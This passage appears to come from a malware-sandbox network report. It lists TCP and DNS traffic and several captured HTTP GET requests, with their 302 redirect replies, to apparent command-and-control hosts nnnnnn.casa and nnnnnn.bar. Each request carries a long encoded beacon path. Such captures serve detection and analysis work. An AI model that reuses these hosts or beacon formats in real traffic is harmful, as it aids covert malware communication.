Jan 21, 2022 07:52:32.298830986 CET	80	49751	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:32.298924923 CET	49750	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:32.299029112 CET	49751	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:32.299140930 CET	80	49749	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:32.300170898 CET	49750	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:32.360723019 CET	80	49750	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:32.360757113 CET	80	49750	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:32.360863924 CET	49750	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:32.361042976 CET	49750	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:32.421195984 CET	80	49750	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:33.092344046 CET	49752	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:33.092891932 CET	49753	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:33.093578100 CET	49754	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:33.093943119 CET	49755	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:33.136466026 CET	49756	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:33.137164116 CET	49757	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:33.153539896 CET	80	49755	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:33.153671026 CET	49755	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:33.154788971 CET	49755	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:33.155654907 CET	80	49752	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:33.155750036 CET	49752	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:33.156444073 CET	80	49753	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:33.156532049 CET	49753	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:33.156763077 CET	80	49754	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:33.156846046 CET	49754	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:33.156999111 CET	49752	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:33.200208902 CET	80	49757	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:33.200242996 CET	80	49756	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:33.200398922 CET	49757	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:33.200453997 CET	49756	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:33.200898886 CET	49756	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:33.215770960 CET	80	49755	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:33.215807915 CET	80	49755	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:33.215879917 CET	49755	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:33.216089010 CET	49755	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:33.220377922 CET	80	49752	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:33.220407009 CET	80	49752	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:33.220477104 CET	49752	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:33.224194050 CET	49752	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:33.224863052 CET	49754	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:33.266338110 CET	80	49756	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:33.266410112 CET	80	49756	31.41.46.120	192.168.2.3
Jan 21, 2022 07:52:33.266556025 CET	49756	80	192.168.2.3	31.41.46.120
Jan 21, 2022 07:52:33.269349098 CET	49756	80	192.168.2.3	31.41.46.120

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 21, 2022 07:52:31.536573887 CET	57875	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:52:31.554512024 CET	53	57875	8.8.8.8	192.168.2.3
Jan 21, 2022 07:52:33.055603981 CET	54154	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:52:33.063489914 CET	52806	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:52:33.073617935 CET	53	54154	8.8.8.8	192.168.2.3
Jan 21, 2022 07:52:33.079840899 CET	53	52806	8.8.8.8	192.168.2.3
Jan 21, 2022 07:52:33.105743885 CET	53910	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:52:33.123266935 CET	53	53910	8.8.8.8	192.168.2.3
Jan 21, 2022 07:53:18.026475906 CET	63297	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:53:18.046252012 CET	53	63297	8.8.8.8	192.168.2.3
Jan 21, 2022 07:53:20.502280951 CET	58361	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:53:20.505213022 CET	53615	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:53:20.508810043 CET	50728	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:53:20.526889086 CET	53	53615	8.8.8.8	192.168.2.3
Jan 21, 2022 07:53:20.526930094 CET	53	50728	8.8.8.8	192.168.2.3
Jan 21, 2022 07:53:20.559519053 CET	53	58361	8.8.8.8	192.168.2.3
Jan 21, 2022 07:53:22.058412075 CET	57106	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:53:22.078999996 CET	60352	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:53:22.081625938 CET	53	57106	8.8.8.8	192.168.2.3
Jan 21, 2022 07:53:22.100311995 CET	53	60352	8.8.8.8	192.168.2.3
Jan 21, 2022 07:53:23.927560091 CET	56773	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:53:23.933923960 CET	60982	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:53:23.951951981 CET	53	56773	8.8.8.8	192.168.2.3
Jan 21, 2022 07:53:23.956944942 CET	53	60982	8.8.8.8	192.168.2.3
Jan 21, 2022 07:53:51.772736073 CET	51539	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:53:51.791054010 CET	53	51539	8.8.8.8	192.168.2.3
Jan 21, 2022 07:53:53.018518925 CET	55393	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:53:53.027496099 CET	50585	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:53:53.036653996 CET	53	55393	8.8.8.8	192.168.2.3
Jan 21, 2022 07:53:53.045314074 CET	53	50585	8.8.8.8	192.168.2.3
Jan 21, 2022 07:53:53.051220894 CET	63456	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:53:53.069173098 CET	53	63456	8.8.8.8	192.168.2.3
Jan 21, 2022 07:54:16.158632994 CET	55108	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:54:16.180954933 CET	53	55108	8.8.8.8	192.168.2.3
Jan 21, 2022 07:54:19.748878002 CET	58942	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:54:19.784967899 CET	53	58942	8.8.8.8	192.168.2.3
Jan 21, 2022 07:54:21.350162983 CET	64432	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:54:21.366064072 CET	49250	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:54:21.367357969 CET	53	64432	8.8.8.8	192.168.2.3
Jan 21, 2022 07:54:21.385416031 CET	63490	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:54:21.389899015 CET	53	49250	8.8.8.8	192.168.2.3
Jan 21, 2022 07:54:21.405597925 CET	53	63490	8.8.8.8	192.168.2.3
Jan 21, 2022 07:54:24.293394089 CET	65110	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:54:24.313271046 CET	53	65110	8.8.8.8	192.168.2.3
Jan 21, 2022 07:54:43.969847918 CET	61120	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:54:43.993266106 CET	53	61120	8.8.8.8	192.168.2.3
Jan 21, 2022 07:54:47.070692062 CET	50824	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:54:47.093403101 CET	53	50824	8.8.8.8	192.168.2.3
Jan 21, 2022 07:54:47.448050976 CET	56706	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:54:47.464580059 CET	53	56706	8.8.8.8	192.168.2.3
Jan 21, 2022 07:54:49.845648050 CET	53569	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:54:49.862381935 CET	53	53569	8.8.8.8	192.168.2.3
Jan 21, 2022 07:55:07.503159046 CET	65501	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:55:07.519746065 CET	53	65501	8.8.8.8	192.168.2.3
Jan 21, 2022 07:55:10.290509939 CET	53465	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:55:10.306759119 CET	53	53465	8.8.8.8	192.168.2.3
Jan 21, 2022 07:55:18.790206909 CET	49290	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:55:18.808697939 CET	53	49290	8.8.8.8	192.168.2.3
Jan 21, 2022 07:55:19.111947060 CET	59754	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:55:19.131164074 CET	53	59754	8.8.8.8	192.168.2.3
Jan 21, 2022 07:55:19.151851892 CET	49234	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:55:19.172622919 CET	53	49234	8.8.8.8	192.168.2.3
Jan 21, 2022 07:55:19.473258972 CET	58720	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:55:19.491530895 CET	53	58720	8.8.8.8	192.168.2.3
Jan 21, 2022 07:55:27.745961905 CET	57447	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:55:27.767707109 CET	53	57447	8.8.8.8	192.168.2.3
Jan 21, 2022 07:55:30.511321068 CET	63583	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:55:30.529737949 CET	53	63583	8.8.8.8	192.168.2.3
Jan 21, 2022 07:55:39.566582918 CET	64099	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:55:39.584458113 CET	53	64099	8.8.8.8	192.168.2.3
Jan 21, 2022 07:55:39.977742910 CET	64610	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:55:39.996416092 CET	53	64610	8.8.8.8	192.168.2.3
Jan 21, 2022 07:55:59.773462057 CET	51989	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:55:59.791659117 CET	53	51989	8.8.8.8	192.168.2.3
Jan 21, 2022 07:56:00.202368975 CET	53152	53	192.168.2.3	8.8.8.8
Jan 21, 2022 07:56:00.223572969 CET	53	53152	8.8.8.8	192.168.2.3

Timestamp	kBytes transferred	Direction	Data
Jan 21, 2022 07:53:19.287817955 CET	1869	OUT	GET /drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5tIp9mQUoOfWLynTM/O86glIn9ihyHk/5dZsFtfy/gp_2FLvf0NHL3yVUkVbncwC/We6V8shIxB/_2BT5Ij9nSjAjmHue/61Ynbzrr_2B_/2FOk8Wface5/lcJD0_2FBb9PKs/3pUPEuZF5gHL68StfaFm9/KhGw_2FEloE_2FaF/OCoSTxCMO1I6oVZ/G3ADi.jlk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: nnnnnn.casa Connection: Keep-Alive
Jan 21, 2022 07:53:22.050024986 CET	1894	IN	HTTP/1.1 302 Found Server: nginx Date: Fri, 21 Jan 2022 06:53:21 GMT Content-Type: text/html; charset=utf-8 Content-Length: 324 Connection: keep-alive Location: http://www.nnnnnn.casa/drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5tIp9mQUoOfWLynTM/O86glIn9ihyHk/5dZsFtfy/gp_2FLvf0NHL3yVUkVbncwC/We6V8shIxB/_2BT5Ij9nSjAjmHue/61Ynbzrr_2B_/2FOk8Wface5/lcJD0_2FBb9PKs/3pUPEuZF5gHL68StfaFm9/KhGw_2FEloE_2FaF/OCoSTxCMO1I6oVZ/G3ADi.jlk X-Served-By: Namecheap URL Forward Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6e 6e 6e 6e 6e 2e 63 61 73 61 2f 64 72 65 77 2f 5f 32 42 30 33 56 6e 65 68 6a 45 37 30 73 78 62 6b 63 2f 6a 79 72 74 34 6b 45 54 6e 2f 47 49 54 38 79 5a 68 33 49 62 43 78 69 54 5f 32 46 6f 71 69 2f 41 56 6d 54 38 73 6c 33 52 42 41 54 4e 65 32 33 33 74 6e 2f 5a 70 58 77 64 35 74 49 70 39 6d 51 55 6f 4f 66 57 4c 79 6e 54 4d 2f 4f 38 36 67 6c 49 6e 39 69 68 79 48 6b 2f 35 64 5a 73 46 74 66 79 2f 67 70 5f 32 46 4c 76 66 30 4e 48 4c 33 79 56 55 6b 56 62 6e 63 77 43 2f 57 65 36 56 38 73 68 49 78 42 2f 5f 32 42 54 35 49 6a 39 6e 53 6a 41 6a 6d 48 75 65 2f 36 31 59 6e 62 7a 72 72 5f 32 42 5f 2f 32 46 4f 6b 38 57 66 61 63 65 35 2f 6c 63 4a 44 30 5f 32 46 42 62 39 50 4b 73 2f 33 70 55 50 45 75 5a 46 35 67 48 4c 36 38 53 74 66 61 46 6d 39 2f 4b 68 47 77 5f 32 46 45 6c 6f 45 5f 32 46 61 46 2f 4f 43 6f 53 54 78 43 4d 4f 31 49 36 6f 56 5a 2f 47 33 41 44 69 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href='http://www.nnnnnn.casa/drew/_2B03VnehjE70sxbkc/jyrt4kETn/GIT8yZh3IbCxiT_2Foqi/AVmT8sl3RBATNe233tn/ZpXwd5tIp9mQUoOfWLynTM/O86glIn9ihyHk/5dZsFtfy/gp_2FLvf0NHL3yVUkVbncwC/We6V8shIxB/_2BT5Ij9nSjAjmHue/61Ynbzrr_2B_/2FOk8Wface5/lcJD0_2FBb9PKs/3pUPEuZF5gHL68StfaFm9/KhGw_2FEloE_2FaF/OCoSTxCMO1I6oVZ/G3ADi.jlk'>Found</a>.

Timestamp	kBytes transferred	Direction	Data
Jan 21, 2022 07:53:20.714209080 CET	1870	OUT	GET /drew/CC6vFhlW/UuVttcLu_2BA_2FHtMOxPk2/p06phiAIxA/gjdrBk68bYot5XSac/3ntrXmBRPVVJ/FuVIEN7_2Fo/aCnj_2FmBhObAK/8aP2AGVPAOybsQywMs_2B/E7LrnE42ALU_2Fwo/mL9Qj0_2B7r7nQz/aXlT6k2ThGhFMeZNO0/C87T1WAh3/OF6zkGz8oPN1AcA9PsPW/m4gDLcKkqegQQkIsQ30/5rDEv5BBA0O3c2DxTO5H5u/dBzGm_2Bv0iek/Yq2.jlk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: nnnnnn.casa Connection: Keep-Alive
Jan 21, 2022 07:53:23.919502974 CET	10767	IN	HTTP/1.1 302 Found Server: nginx Date: Fri, 21 Jan 2022 06:53:23 GMT Content-Type: text/html; charset=utf-8 Content-Length: 322 Connection: keep-alive Location: http://www.nnnnnn.casa/drew/CC6vFhlW/UuVttcLu_2BA_2FHtMOxPk2/p06phiAIxA/gjdrBk68bYot5XSac/3ntrXmBRPVVJ/FuVIEN7_2Fo/aCnj_2FmBhObAK/8aP2AGVPAOybsQywMs_2B/E7LrnE42ALU_2Fwo/mL9Qj0_2B7r7nQz/aXlT6k2ThGhFMeZNO0/C87T1WAh3/OF6zkGz8oPN1AcA9PsPW/m4gDLcKkqegQQkIsQ30/5rDEv5BBA0O3c2DxTO5H5u/dBzGm_2Bv0iek/Yq2.jlk X-Served-By: Namecheap URL Forward Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6e 6e 6e 6e 6e 2e 63 61 73 61 2f 64 72 65 77 2f 43 43 36 76 46 68 6c 57 2f 55 75 56 74 74 63 4c 75 5f 32 42 41 5f 32 46 48 74 4d 4f 78 50 6b 32 2f 70 30 36 70 68 69 41 49 78 41 2f 67 6a 64 72 42 6b 36 38 62 59 6f 74 35 58 53 61 63 2f 33 6e 74 72 58 6d 42 52 50 56 56 4a 2f 46 75 56 49 45 4e 37 5f 32 46 6f 2f 61 43 6e 6a 5f 32 46 6d 42 68 4f 62 41 4b 2f 38 61 50 32 41 47 56 50 41 4f 79 62 73 51 79 77 4d 73 5f 32 42 2f 45 37 4c 72 6e 45 34 32 41 4c 55 5f 32 46 77 6f 2f 6d 4c 39 51 6a 30 5f 32 42 37 72 37 6e 51 7a 2f 61 58 6c 54 36 6b 32 54 68 47 68 46 4d 65 5a 4e 4f 30 2f 43 38 37 54 31 57 41 68 33 2f 4f 46 36 7a 6b 47 7a 38 6f 50 4e 31 41 63 41 39 50 73 50 57 2f 6d 34 67 44 4c 63 4b 6b 71 65 67 51 51 6b 49 73 51 33 30 2f 35 72 44 45 76 35 42 42 41 30 4f 33 63 32 44 78 54 4f 35 48 35 75 2f 64 42 7a 47 6d 5f 32 42 76 30 69 65 6b 2f 59 71 32 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href='http://www.nnnnnn.casa/drew/CC6vFhlW/UuVttcLu_2BA_2FHtMOxPk2/p06phiAIxA/gjdrBk68bYot5XSac/3ntrXmBRPVVJ/FuVIEN7_2Fo/aCnj_2FmBhObAK/8aP2AGVPAOybsQywMs_2B/E7LrnE42ALU_2Fwo/mL9Qj0_2B7r7nQz/aXlT6k2ThGhFMeZNO0/C87T1WAh3/OF6zkGz8oPN1AcA9PsPW/m4gDLcKkqegQQkIsQ30/5rDEv5BBA0O3c2DxTO5H5u/dBzGm_2Bv0iek/Yq2.jlk'>Found</a>.

Timestamp	kBytes transferred	Direction	Data
Jan 21, 2022 07:53:20.722321987 CET	1871	OUT	GET /drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: nnnnnn.casa Connection: Keep-Alive
Jan 21, 2022 07:53:22.071861982 CET	1895	IN	HTTP/1.1 302 Found Server: nginx Date: Fri, 21 Jan 2022 06:53:21 GMT Content-Type: text/html; charset=utf-8 Content-Length: 329 Connection: keep-alive Location: http://www.nnnnnn.casa/drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlk X-Served-By: Namecheap URL Forward Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6e 6e 6e 6e 6e 2e 63 61 73 61 2f 64 72 65 77 2f 79 38 4f 4f 48 7a 42 58 78 34 76 54 32 4a 61 5f 2f 32 42 42 30 4c 69 75 5f 32 46 32 46 45 70 49 2f 4f 37 49 6c 43 37 61 4e 74 45 6e 4a 6c 79 66 32 31 56 2f 6a 76 6d 63 39 7a 5f 32 42 2f 4c 67 52 52 39 33 46 58 36 30 55 32 4c 41 46 30 4c 4e 69 5f 2f 32 46 5f 32 42 47 63 65 33 76 49 5f 32 42 49 6b 62 6f 65 2f 34 36 51 7a 31 38 45 6c 6c 79 6f 5f 32 42 44 4b 43 48 74 55 71 6b 2f 51 6b 5f 32 42 41 6b 73 31 38 53 6e 4a 2f 55 5f 32 46 77 53 67 4f 2f 73 45 39 4d 6d 6d 37 70 64 37 46 46 38 58 42 66 5f 32 42 65 6c 65 68 2f 42 77 58 4a 4c 47 67 75 69 63 2f 77 55 45 61 42 42 4d 32 44 74 42 4a 73 44 65 49 4b 2f 79 4a 4a 4a 34 34 56 63 57 45 79 6a 2f 59 4e 72 6c 44 64 55 61 44 48 48 2f 42 32 4b 5f 32 42 61 45 77 79 39 32 7a 54 2f 41 50 6a 78 69 6b 6e 6f 61 46 67 55 4e 4b 53 33 7a 6d 4b 37 4f 2f 45 31 69 4b 4c 64 69 61 2f 66 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href='http://www.nnnnnn.casa/drew/y8OOHzBXx4vT2Ja_/2BB0Liu_2F2FEpI/O7IlC7aNtEnJlyf21V/jvmc9z_2B/LgRR93FX60U2LAF0LNi_/2F_2BGce3vI_2BIkboe/46Qz18Ellyo_2BDKCHtUqk/Qk_2BAks18SnJ/U_2FwSgO/sE9Mmm7pd7FF8XBf_2Beleh/BwXJLGguic/wUEaBBM2DtBJsDeIK/yJJJ44VcWEyj/YNrlDdUaDHH/B2K_2BaEwy92zT/APjxiknoaFgUNKS3zmK7O/E1iKLdia/f.jlk'>Found</a>.

Timestamp	kBytes transferred	Direction	Data
Jan 21, 2022 07:53:21.753691912 CET	1872	OUT	GET /drew/cfAdMgmKkin/IKg5kEzUc7O41G/1aJXhaeTcJcKRLHZeVFTR/YESrHc56nHRZVmx4/tYxP0kNt3J09QeX/igdVtxPOUp_2BOV3T1/l9vZu0Xwc/FM_2BB5MarAEMPcAjB1q/MZjYfvc_2FNkAc9icJ8/HZjCPWDoPewJNdLsqIF4PP/luDIFMdUdOiq4/6JYVx7X5/TcpnV0hN0Uxsa0bM5ELNrvr/xkYBmwG0ma/H_2FKJLgQ2JFGX6Xc/bFNqbQR.jlk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: nnnnnn.casa Connection: Keep-Alive
Jan 21, 2022 07:53:23.926692963 CET	10768	IN	HTTP/1.1 302 Found Server: nginx Date: Fri, 21 Jan 2022 06:53:23 GMT Content-Type: text/html; charset=utf-8 Content-Length: 313 Connection: keep-alive Location: http://www.nnnnnn.casa/drew/cfAdMgmKkin/IKg5kEzUc7O41G/1aJXhaeTcJcKRLHZeVFTR/YESrHc56nHRZVmx4/tYxP0kNt3J09QeX/igdVtxPOUp_2BOV3T1/l9vZu0Xwc/FM_2BB5MarAEMPcAjB1q/MZjYfvc_2FNkAc9icJ8/HZjCPWDoPewJNdLsqIF4PP/luDIFMdUdOiq4/6JYVx7X5/TcpnV0hN0Uxsa0bM5ELNrvr/xkYBmwG0ma/H_2FKJLgQ2JFGX6Xc/bFNqbQR.jlk X-Served-By: Namecheap URL Forward Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6e 6e 6e 6e 6e 2e 63 61 73 61 2f 64 72 65 77 2f 63 66 41 64 4d 67 6d 4b 6b 69 6e 2f 49 4b 67 35 6b 45 7a 55 63 37 4f 34 31 47 2f 31 61 4a 58 68 61 65 54 63 4a 63 4b 52 4c 48 5a 65 56 46 54 52 2f 59 45 53 72 48 63 35 36 6e 48 52 5a 56 6d 78 34 2f 74 59 78 50 30 6b 4e 74 33 4a 30 39 51 65 58 2f 69 67 64 56 74 78 50 4f 55 70 5f 32 42 4f 56 33 54 31 2f 6c 39 76 5a 75 30 58 77 63 2f 46 4d 5f 32 42 42 35 4d 61 72 41 45 4d 50 63 41 6a 42 31 71 2f 4d 5a 6a 59 66 76 63 5f 32 46 4e 6b 41 63 39 69 63 4a 38 2f 48 5a 6a 43 50 57 44 6f 50 65 77 4a 4e 64 4c 73 71 49 46 34 50 50 2f 6c 75 44 49 46 4d 64 55 64 4f 69 71 34 2f 36 4a 59 56 78 37 58 35 2f 54 63 70 6e 56 30 68 4e 30 55 78 73 61 30 62 4d 35 45 4c 4e 72 76 72 2f 78 6b 59 42 6d 77 47 30 6d 61 2f 48 5f 32 46 4b 4a 4c 67 51 32 4a 46 47 58 36 58 63 2f 62 46 4e 71 62 51 52 2e 6a 6c 6b 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href='http://www.nnnnnn.casa/drew/cfAdMgmKkin/IKg5kEzUc7O41G/1aJXhaeTcJcKRLHZeVFTR/YESrHc56nHRZVmx4/tYxP0kNt3J09QeX/igdVtxPOUp_2BOV3T1/l9vZu0Xwc/FM_2BB5MarAEMPcAjB1q/MZjYfvc_2FNkAc9icJ8/HZjCPWDoPewJNdLsqIF4PP/luDIFMdUdOiq4/6JYVx7X5/TcpnV0hN0Uxsa0bM5ELNrvr/xkYBmwG0ma/H_2FKJLgQ2JFGX6Xc/bFNqbQR.jlk'>Found</a>.

Timestamp	kBytes transferred	Direction	Data
Jan 21, 2022 07:54:16.363537073 CET	12356	OUT	GET /drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: nnnnnn.bar Connection: Keep-Alive
Jan 21, 2022 07:54:16.797559977 CET	12357	OUT	GET /drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: nnnnnn.bar Connection: Keep-Alive
Jan 21, 2022 07:54:18.937757015 CET	12358	IN	HTTP/1.1 302 Found Server: nginx Date: Fri, 21 Jan 2022 06:54:18 GMT Content-Type: text/html; charset=utf-8 Content-Length: 321 Connection: keep-alive Location: http://www.nnnnnn.bar/drew/5fbE1WfgCMBb3Lbm27/FrQeHzQMl/dSHY390GafNfv3DHsOxN/_2BRIsFAVWyz2Wu2_2B/16eM0bgWUmWV0_2FTKbCFG/m6xLkSgM48Oze/LZKc_2BO/Myzp5z9Dk_2FbCSnM34XJUg/ogD9Cozi7C/6qyLWzXnGACtiDP4J/KO2WBPMOCxXt/oVhJAyi7HfC/llSp6R5CbMEV6O/pWBWjvBlX_2BzwlI_2FNe/aSFN3R7LiwRoaekP/97se3rx1ezUsiA_2B/0.jlk X-Served-By: Namecheap URL Forward Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6e 6e 6e 6e 6e 6e 2e 62 61 72 2f 64 72 65 77 2f 35 66 62 45 31 57 66 67 43 4d 42 62 33 4c 62 6d 32 37 2f 46 72 51 65 48 7a 51 4d 6c 2f 64 53 48 59 33 39 30 47 61 66 4e 66 76 33 44 48 73 4f 78 4e 2f 5f 32 42 52 49 73 46 41 56 57 79 7a 32 57 75 32 5f 32 42 2f 31 36 65 4d 30 62 67 57 55 6d 57 56 30 5f 32 46 54 4b 62 43 46 47 2f 6d 36 78 4c 6b 53 67 4d 34 38 4f 7a 65 2f 4c 5a 4b 63 5f 32 42 4f 2f 4d 79 7a 70 35 7a 39 44 6b 5f 32 46 62 43 53 6e 4d 33 34 58 4a 55 67 2f 6f 67 44 39 43 6f 7a 69 37 43 2f 36 71 79 4c 57 7a 58 6e 47 41 43 74 69 44 50 34 4a 2f 4b 4f 32 57 42 50 4d 4f 43 78 58 74 2f 6f 56 68 4a 41 79 69 37 48 66 43 2f 6c 6c 53 70 36 52 35 43 62 4d 45 56 36 4f 2f 70 57 42 57 6a 76 42 6c 58 5f 32 42 7a 77 6c 49 5f 32 46 4e 65 2f 61 53 46 4e 33 52 37 4c 69 77 52 6f 61 65 6b 50 2f 39 37 73 65 33 72 78 31 65 7a 55 73 69 41 5f 32 42 2f 30 2e 6a 6c 6b 